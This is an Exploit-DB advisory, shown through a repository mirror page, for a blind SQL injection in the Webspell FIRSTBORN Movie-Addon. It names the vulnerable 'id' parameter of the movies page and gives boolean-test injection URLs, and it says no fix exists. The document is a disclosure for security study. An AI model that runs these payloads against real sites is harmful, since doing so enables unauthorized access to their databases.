bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/19011.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

36 lines
No EOL
1.3 KiB
Text
Raw Blame History

========================================================================================
| # Title : Webspell FIRSTBORN Movie-Addon Blind SQL Injection Vulnerability
| # Author : Easy Laster
| # Script : Webspell FIRSTBORN Movie-Addon
| # Site : www.firstborn.de
| # Price : free
| # Exploitation : Remote Blind SQL Vulnerability
| # Bug : Remote Blind SQL Vulnerability
| # Date : 08.06.2012
| # Language : PHP
| # Status : vulnerable
| # Greetings: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, ezah, Manifest
====================== Proof of Concept =================================
[+] Introduction
FIRSTBORN Movie-Addon is a Addon for the Webspell Web Application for Content Management
System. In this Addon we found a Remote Blind SQL Injection vulnerability.The Movie file
is Vulnerable and a high risk Bug.The Vulnerability is Not fixed from the coder.The most
Webspell Webapplication has a Security System in the Webspell core self.You must bypass
the core from Webspell Security System (globalskiller).
[+] Vulnerability
http://[host]/[path]/index.php?site=movies&action=show&id=[vul]
[+] Exploit
http://[host]/[path]/index.php?site=movies&action=show&id=1+and+1=1--+
http://[host]/[path]/index.php?site=movies&action=show&id=1+and+1=2--+
[+] Fix
No fix.
Reference in a new issue View git blame Copy permalink